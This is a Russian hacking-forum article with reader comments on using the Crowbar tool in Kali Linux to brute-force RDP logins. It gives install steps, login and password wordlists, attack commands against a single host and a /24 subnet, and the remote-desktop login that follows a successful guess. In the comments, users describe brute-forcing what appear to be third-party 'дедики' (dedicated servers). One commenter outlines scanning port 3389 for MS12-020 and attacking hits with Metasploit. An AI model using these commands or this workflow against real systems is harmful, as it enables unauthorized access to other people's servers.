Статья Обзор скрипта для брутфорса Crowbar в KaliLinux


Я не знаю, потянет ли данная статья на участие в конкурсе, поэтому решение об её участии оставляю за администрацией форума .

Я не планировала писать эту статью.

Её написание пришло спонтанно и фактически явилось "побочным эффектом" от более тесного знакомства со скриптом для брутфорса "Patator".

Так уж сложились обстоятельства, что я не люблю заниматься хакингом на локальной машине. Для этих целей у меня всегда имеется виртуальный выделенный сервер. Обычно мои VDS управляются либо Windows, либо CentOS.

Вчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))

В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )

Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.
Встречайте, Его Величество Crowbar.

Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.

Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.

Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.

Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.
На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.
По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar.
Код:
# apt-get update
Брут Crowbar - это скрипт на питоне , который вызывает системные программы с нужными параметрами . Для брута rdp вызывается xfreerdp клиент :
Код:
# apt-get install freerdp-x11

5wZmJIUzgplv39LItz6cvtk6tD2zlA.png

Проверка работоспособности xfreerdp
Код:
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84
Вышеуказанные команды вызывают адекватную реакцию, никаких ошибок в отличие от работы на удалённой CentOS 7 не выдали, значит можно продолжить.

Клонируем скрипт Crowbar при помощи git:
Код:
# git clone https://github.com/galkan/crowbar
Заходим в папку со скриптом:
Код:
# cd crowbar
Файлу надо добавить бит исполнимости (возможно, эта команда - лишняя, но я решила подстраховаться):
Код:
# chmod +x crowbar.py
Проверим работоспособность скрипта на этом этапе. Зададим ему команду выдать справку о себе.
Код:
# python crowbar.py --help

mJUdfPl5Ye3iCwj7yYwDL77r8CdDtS.png

Перед моим взором на экране монитора появилась страница справки по программе.
В этом месте возможно появление следующей ошибки:
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
Код:
# yum -y update
# yum -y install python-pip
# pip install --upgrade pip
Или
Код:
# pip install --upgrade setuptools
# pip install --upgrade distribute
Опять пробуем запустить "Хелп"
Код:
# python crowbar.py --help
Работает ))

На этом - ВСЁ.
Всё коротко и лаконично )
Создаём текстовые файлы с предполагаемым списком логинов
Администратор
Administrator
admin
nimda
а также со списком предполагаемых паролей:
admin
root
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
Запуск скрипта питон в скрипте баш
Атаковать будем мой тестовый дедик IP 185.1хх.13.хх
Команда для атаки в моём случае должна иметь следующий вид:
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
Сканирование подсети 185.1хх.13.хх/24
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt  -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
Короткие пояснения :
-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.
Подключаемся к его удалённому рабочему столу.
Код:
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх

bydpYk97dxhlDsJPp0cTsx00kDM33o.png

Успех )

В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта


На этом у меня всё.
Всем - спасибо )
 
Последнее редактирование модератором:
Спасибо за статью, один вопрос - зачем так усиленно прятать тестовый ip за звёздами, а потом показывать его на скрине?)
недосып?)
 
Вроде все работает , но есть одно но, в Good на одном ip с брутил 35 дедиков у всех разные пароли и логины и не один не подходит , дедик выдает не правильный пароль или логин , в чем может быть проблема ?
 
Проблема лишь в том, что на форуме нет ни одного экстрасенса.
Если хочешь получить реальный совет, потрудись обрисовать ситуацию подробнее, приложить логи, скриншоты.
 
  • Нравится
Реакции: nikos
вот файл Good
[doublepost=1511359331,1511308644][/doublepost]
Проблема лишь в том, что на форуме нет ни одного экстрасенса.
Если хочешь получить реальный совет, потрудись обрисовать ситуацию подробнее, приложить логи, скриншоты.
А я думал люди с такими возможностями которые изобрели этот скрипт , они есть как экстрасенсы .
 

Вложения

  • good.txt
    good.txt
    20 КБ · Просмотры: 532
Именно этот скрипт был использован при прохождении пентестит лабы при бруте рдп, а гидра имея такой же словарь не справилась с работой.
Спасибо за статью.
 
Как я понимаю, просто по списку ip адресов данный скрипт не работает?
 
ввожу команду :
python crowbar.py -b rdp -U /root/login.txt -C /root/pass.txt -S /root/ip3389.txt -o good3389.txt -n 100 -t 500 -v
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>

Как я понимаю список ip в таком формате:
193.1.1.123
193.1.1.124
193.1.1.125

скрипт не распознает?
 
ввожу команду :
python crowbar.py -b rdp -U /root/login.txt -C /root/pass.txt -S /root/ip3389.txt -o good3389.txt -n 100 -t 500 -v
Пишет : Invalid IP Address! Please use IP/CIDR notation <192.168.37.37/32, 192.168.1.0/24>

Как я понимаю список ip в таком формате:
193.1.1.123
193.1.1.124
193.1.1.125

скрипт не распознает?
Я предположу что s маленькая
 
Привет. Помоги разобраться, не сканирует. Логи тоже не пишет. Установил все по порядку, ошибок не было.

root@kali:/crowbar# python crowbar.py -b rdp -U login.txt -C pass.txt -s 124.123.133.12/24 -o good.txt -n 100 -t 500 -v -d
2018-01-05 06:43:52 START
2018-01-05 06:43:52 Crowbar v0.3.5-dev
2018-01-05 06:43:52 Brute Force Type: rdp
2018-01-05 06:43:52 Output File: /crowbar/good.txt
2018-01-05 06:43:52 Log File: /crowbar/crowbar.log
2018-01-05 06:43:52 Discover Mode: True
2018-01-05 06:43:52 Verbose Mode: 1
2018-01-05 06:43:52 Debug Mode: False
2018-01-05 06:43:52 Discovery mode - port scanning: 124.123.133.12/24
2018-01-05 06:43:56 STOP
2018-01-05 06:43:56 No results found...
root@kali:/crowbar# ls
crowbar-blackhat-arsenal.md crowbar.py good.txt images lib LICENSE.txt login.txt pass.txt README.md
root@kali:/crowbar#
 
Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Screenshot_15.jpg

вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
 
Последнее редактирование:
Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
друг не до конца понял , что ты имеешь ввиду)) можешь разжевать?))
 
Статья не плоха, в жизни пригодится но брут это долго и не надежно, тем более судя по коментам скрипт, увы сыроват... Да и банально, ждешь пока про брутит. Если бы мне нужны были дедики и т.д., я бы подошел к этому вопросу так..

Посмотреть вложение 14383
вот с этим уже веселее)) а с этим скриптом веселья больше прибавится )


удачи!
Статью бы от тебя, эх..
 
  • Нравится
Реакции: Ondrik8
Статью бы от тебя, эх..
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)
 
  • Нравится
Реакции: Cyber Satori, MRR и MEBIUS
тестить нужно, дедики искать пробывать определить скриптом от нмапа на уязвимость указанную выше.... искать сначало по 3389 открытым потом прогоняешь через скрипт на наличие уязвимости и если она имеется, пробивать метасплойтом, все)

А как метасплоитом пробивать? Нашел я кучу таких уязвимых серверов... Ввожу в msfconsole:

search ms12-020, вижу сканер и эксплоит. Экслоит - ms12_020_maxchannelids. Только вот, насколько я понял, он просто кладет сервер и все. Толку то от этого? Пишет что эксплоит отработан, seems down.
 
  • Нравится
Реакции: MEBIUS
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!